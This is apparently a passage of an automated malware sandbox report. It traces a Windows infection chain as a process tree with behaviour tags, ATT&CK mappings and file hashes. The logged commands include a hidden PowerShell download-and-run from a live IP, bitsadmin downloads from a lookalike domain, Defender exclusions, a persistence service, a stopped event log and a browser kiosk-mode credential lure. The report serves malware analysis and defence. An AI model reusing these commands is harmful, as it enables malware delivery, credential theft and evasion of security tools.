2664 2308 65fb82b9fe.exe 55 PID 2308 wrote to memory of 2664 2308 65fb82b9fe.exe 55 PID 2308 wrote to memory of 2664 2308 65fb82b9fe.exe 55 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe"C:\Users\Admin\AppData\Local\Temp\6c1c13c558064b548a5c9d5d791cd652bef19802cca778fe560ab64bbfb698b8.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn OiaqAmaITEZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\h1ZBzSU6S.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn OiaqAmaITEZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\h1ZBzSU6S.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2524
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\h1ZBzSU6S.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE"C:\Users\Admin\AppData\Local\TempXM9NCVKIA8LY1AC297A9PMXUTVRR7BMZ.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\10105590101\4cee97f6df.exe"C:\Users\Admin\AppData\Local\Temp\10105590101\4cee97f6df.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 12127⤵
- Loads dropped DLL
- Program crash
PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105600101\f62db21d11.exe"C:\Users\Admin\AppData\Local\Temp\10105600101\f62db21d11.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
-
C:\Users\Admin\AppData\Local\Temp\10105610101\65fb82b9fe.exe"C:\Users\Admin\AppData\Local\Temp\10105610101\65fb82b9fe.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2664
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3000 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3000.0.1511755674\88756653" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {411c019a-80d2-44ad-b533-cd8636a7d071} 3000 "\\.\pipe\gecko-crash-server-pipe.3000" 1288 121f5358 gpu9⤵PID:2712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3000.1.133270363\177022422" -parentBuildID 20221007134813 -prefsHandle 1464 -prefMapHandle 1460 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {94eb7013-e908-40cc-89d5-9044b5a677f1} 3000 "\\.\pipe\gecko-crash-server-pipe.3000" 1476 e74e58 socket9⤵PID:1828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3000.2.1515965126\713890070" -childID 1 -isForBrowser -prefsHandle 2080 -prefMapHandle 2076 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {423c91bd-5c29-4e08-8d62-6a85ba3c4ee8} 3000 "\\.\pipe\gecko-crash-server-pipe.3000" 2092 1a49ac58 tab9⤵PID:2380
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3000.3.1133081481\1079293692" -childID 2 -isForBrowser -prefsHandle 2908 -prefMapHandle 2904 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a11b37b-a813-467d-a683-fa4da743fbc2} 3000 "\\.\pipe\gecko-crash-server-pipe.3000" 2920 e5d258 tab9⤵PID:1328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3000.4.1298994108\1038289138" -childID 3 -isForBrowser -prefsHandle 3712 -prefMapHandle 3696 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02a1abab-b928-41ab-b9a5-3d2bb78f6795} 3000 "\\.\pipe\gecko-crash-server-pipe.3000" 3728 1f15ec58 tab9⤵PID:1464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3000.5.173517012\787071751" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e162bce9-348d-4e4d-a39c-6f8f317601a5} 3000 "\\.\pipe\gecko-crash-server-pipe.3000" 3832 20c2b258 tab9⤵PID:1312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3000.6.1823232467\945336367" -childID 5 -isForBrowser -prefsHandle 4004 -prefMapHandle 4008 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {93c8b46b-b679-4aa5-84ec-bb803b3d6aa8} 3000 "\\.\pipe\gecko-crash-server-pipe.3000" 3996 20c2bb58 tab9⤵PID:1696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105620101\f3c2a01352.exe"C:\Users\Admin\AppData\Local\Temp\10105620101\f3c2a01352.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\10105630101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10105630101\v6Oqdnc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 12007⤵
- Loads dropped DLL
- Program crash
PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105640101\OEHBOHk.exe"C:\Users\Admin\AppData\Local\Temp\10105640101\OEHBOHk.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3356 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:3808
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵
- Drops file in Windows directory
PID:3932
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "DWENDQPG"7⤵
- Launches sc.exe
PID:3864
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"7⤵
- Launches sc.exe
PID:3952
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:4012
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "DWENDQPG"7⤵
- Launches sc.exe
PID:4020
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105650101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 5007⤵
- Loads dropped DLL
- Program crash
PID:3564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105660101\Y87Oyyz.exe"C:\Users\Admin\AppData\Local\Temp\10105660101\Y87Oyyz.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2888 -
C:\Windows\Temp\{250F0B5D-1A71-43C9-A1CB-8AD5E092DF5A}\.cr\Y87Oyyz.exe"C:\Windows\Temp\{250F0B5D-1A71-43C9-A1CB-8AD5E092DF5A}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10105660101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=1887⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1616 -
C:\Windows\Temp\{97BCD807-65EA-4A60-925D-00F0633D9369}\.ba\SplashWin.exeC:\Windows\Temp\{97BCD807-65EA-4A60-925D-00F0633D9369}\.ba\SplashWin.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:320 -
C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exeC:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exeC:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe11⤵
- Loads dropped DLL
PID:2988
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10105671121\fCsM05d.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:3592 -
C:\Windows\SysWOW64\fltMC.exefltmc7⤵
- System Location Discovery: System Language Discovery
PID:3588
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3520
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\Admin\AppData\Local\Temp\vrep_install\Client32.ini"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3608
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\Admin\AppData\Local\Temp\vrep_install\NSM.lic"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3488
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105680101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10105680101\zY9sqWs.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3344 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 10367⤵
- Loads dropped DLL
- Program crash
PID:3472
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105690101\Ps7WqSx.exe"C:\Users\Admin\AppData\Local\Temp\10105690101\Ps7WqSx.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3560
-
-
C:\Users\Admin\AppData\Local\Temp\10105700101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10105700101\FvbuInU.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2376
-
-
-
-
-
-
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exeC:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4052 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:3048
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1928
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3168
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Defense Evasion
BITS Jobs
1Impair Defenses
6Disable or Modify Tools
5Modify Registry
7Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD5ca1fbde6f905015db89e9b0fc013293c
SHA19f357f9ebb07b4bdb2ee9de495a94da92e96534a
SHA2561dc12cd1cef33998387f2c24827a32a385bd5f909f67422a7bed4fbdd4afad9c
SHA512cd15ff91bf4ec5ed8184b71abb91cb76059e1dc1f0ac56b69060d230c2cf8645eb90d5a4347b1ec8c329495da56e6e12fa7170dfcc2164fc4d30f09335d2a40a
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
3.1MB
MD5fb8a11382106b0ef3454fc1aa5a86c50
SHA1f41d205674642f6a335ba9e90d620d20eb2eaf7c
SHA256086f8bc32eddaa4e947338c087f677b1a78da8f7fc4604d0d0519c093e38f7f4
SHA5126190e5830f82fdf19bef61a918b4123f1fa45828a7937e682fc80892d3771eef56a4989185261d9b59af72d4edb08e3b15313170dca1baf6e5cc2e643e0e2bb4
-
Filesize
1.8MB
MD50824d5f9638e1fed7aea21a97f70f38c
SHA183aead23fff28d92a28748702d8329818483c6bc
SHA2566f2daaadec4daf489f7a5f923ecf0ef5b7a0af365d4af7e36040904f68545a90
SHA512c86e43dac2b620c3d3465c0e9a9c78e72293881cf44b2e5c161c4d6d2ffe601e275bbc651e4a02e1f71f4bd2dc7df0e54248a7f2dc7756696cd42099186953aa
-
Filesize
947KB
MD528f3e4c645b836fe6b7893752b37edcb
SHA1af8e67a82648f1cb435ca22d26656fcad6bec9d6
SHA25694757246933bf308c399fc5a46cb74a9203f5940de0c1724cdc9a01ac32d7aef
SHA512d00eb74351597901d3feccedf26de34221ef6c08b5aa40b3f2d1669ef90ec0fa2ee935fad71fade353d5e889c21c7ef2bb270793ed19a2dd80ceae87f65181f8
-
Filesize
1.7MB
MD5b9ec326f2c59b318c0a4ead48270846f
SHA18da0767e75879e574bcb3dc1eccde1b4abd5beef
SHA2563f95a0648e4744771d61482b075cedb4d60694226cacddc5882e651acd8c42cd
SHA5129cc550f7f8bd20bdc8543fca2773faa13defcde86ea09bf5111be60b1b65f085946162d49d8ed992db33d40c649832890397ca83e60ff1f7f2a1d2f54822f77e
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
5.0MB
MD5ddab071e77da2ca4467af043578d080c
SHA1226518a5064c147323482ac8db8479efd4c074f8
SHA256d3271bc7c315bd03e070cc2048c0349a73ecd858df500f2a2e2f09d606dfe79c
SHA512e3dc210bef348b324c9a00e32648b50a6cd0f078eefa436b201afd10853b648654de3fd993a1cea9d1aa4e7dde6587de1c1f8c09e09af7c62dde8536fd43d6d8
-
Filesize
415KB
MD5641525fe17d5e9d483988eff400ad129
SHA18104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA2567a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
-
Filesize
5.7MB
MD55fb40d81dac830b3958703aa33953f4f
SHA18f4689497df5c88683299182b8b888046f38c86a
SHA256b2395af2b5497ded848bfffc2192747510420b0a7bab9897322aed765c66d9dc
SHA51280b400bb79c4cbed1fb35af0fae1b88b399d679f7c99c625214082d143f51d381436abb27284b0205bdacf38cafa742a32c46ce8136ad7684d566d2e19bfab8e
-
Filesize
1KB
MD59e4466ae223671f3afda11c6c1e107d1
SHA1438b65cb77e77a41e48cdb16dc3dee191c2729c7
SHA256ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f
SHA5123f7be864e567e1906f9227fe4b8e47a9f16032d732aecfc7256e581939e3b810bc6e696c4a80be670624e5fd08c336d539e23ed825bd823614a2fcda3b21f2aa
-
Filesize
361KB
MD52bb133c52b30e2b6b3608fdc5e7d7a22
SHA1fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA51273229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f
-
Filesize
6.8MB
MD5dab2bc3868e73dd0aab2a5b4853d9583
SHA13dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA5123aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8
-
Filesize
1.8MB
MD59dadf2f796cd4500647ab74f072fd519
SHA192b6c95a6ed1e120488bd28ac74274e874f6e740
SHA256e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76
SHA512fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
717B
MD52302b0bd21b085bc2a318016b333b146
SHA1f75721cf9c70ff1476e96f540e69f184abf6717d
SHA2563efa5bb613bba16ba8cf65182ddc811574641fa2773d6e743844fd6c426c0d10
SHA5128a5ecea6c35b66857fd2bbe1a65c6181004bd330237ace5b433b8b66c04e7678a6078138f635cc17c526e6634781ad991447f3f53fddb52db2211b9dbac19823
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8FYNEBO5PGG74648DJ6E.temp
Filesize7KB
MD5ef6258edaeaa2ea9a2c9a83dd5938469
SHA1138c0679afda06b7afa0d481aa65e55546e056c2
SHA256e7a4ed17c487cce740a3fc72c85cff04cfd06fe283231393001d3879b8100483
SHA5124738e04fb1659ac438a8266b2eec501385645dd0226b738a23dc38875656645ffd644fe43f1bce1ae533b87565de60ffe3c3a0d22ab234de851356a70ac3374b
-
